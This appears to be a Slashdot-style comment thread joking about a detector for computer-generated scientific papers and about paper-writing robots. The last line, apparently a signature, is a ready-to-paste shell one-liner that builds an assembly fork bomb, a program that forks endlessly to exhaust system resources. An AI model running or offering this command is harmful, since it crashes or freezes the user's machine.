Fake Scientific Paper Detector
moon_monkey writes "Ever wondered whether a scientific paper was actually written by a robot? A new program developed by researchers at Indiana University promises to tell you one way or the other. It was actually developed in response to a prank by MIT researchers who generated a paper from random bits of text and got it accepted for a conference."
so can a robot write a paper and then decide whether the paper was written by a robot (itself)?
Jesus said to his disciples: "If you don't have a sword, sell your cloak and buy one" - Luke 22:36
I hope the ACLU will ensure that discrimination against metal people will not be allowed to continue.
"This text had been classified as
INAUTHENTIC
with a 24.9% chance of being authentic text"
No kidding.
It seems like it wouldn't be too difficult to modify the MIT program to use this new anti-robot robot to write papers that this anti-robot robot would not be able to detect. Ideally, this would be done with a learning algorithm (so that it could easily be extended to other anti-robot robot programs), but reverse-engineering the anti-robot robot (by humans) should also provide a solution.
Now that Indiana U has thrown down the gauntlet, I wouldn't be surprised if MIT responds. Hopefully it will result in an even better paper-writing robot. Ideally, it will lead to dissertation-writing robots. :)
Ben Hocking
Need a professional organizer?
I, for one, peruse the blogosphere. On my Powerbook, wearing a black turtle neck and beret. Stroking my goatee thoughtfully. Sipping a latté in a café
If I could just find a way to recharge my PowerBook from your hatred, I could stop carrying this ugly power adaptor.
echo -e 'global _start\n _start:\n mov eax, 2\n int 80h\n jmp _start' > a.asm; nasm a.asm -f elf; ld a.o -o a;